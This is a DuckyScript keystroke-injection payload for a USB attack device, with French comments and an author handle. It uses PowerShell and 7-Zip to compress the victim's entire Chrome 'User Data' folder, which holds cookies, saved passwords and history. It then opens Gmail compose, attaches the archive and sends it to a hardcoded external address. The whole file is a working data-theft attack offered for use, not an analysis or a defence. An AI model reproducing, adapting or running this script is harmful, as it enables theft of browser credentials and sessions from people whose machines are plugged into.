REM     -----------------------------------------------------------------------------
REM     Author: KaazDW
REM     -----------------------------------------------------------------------------

GUI r
DELAY 500
STRING powershell
DELAY 500
ENTER
DELAY 500
STRING cd "$env:LOCALAPPDATA\Google\Chrome\User Data"
DELAY 500
ENTER
DELAY 500

REM Utiliser 7-Zip pour compresser le dossier User Data
STRING "C:\Program Files\7-Zip\7z.exe" a -r -tzip "$env:TEMP\ChromeUserData.zip" .
ENTER
DELAY 20000

REM Ouvrir le menu Démarrer
GUI r
DELAY 500
REM                               
STRING https://mail.google.com/mail/?view=cm&fs=1&to=cz2600036@gmail.com&su=message%20from%20usb&body=reporting%20in
ENTER
DELAY 6000

REM Coller l'adresse du mail
CTRL V
DELAY 500

REM Joindre le fichier zip au mail
TAB
TAB
TAB
TAB
ENTER
DELAY 500
STRING "$env:TEMP\ChromeUserData.zip"
ENTER
DELAY 500

REM Envoyer le mail
CTRL ENTER
DELAY 3000
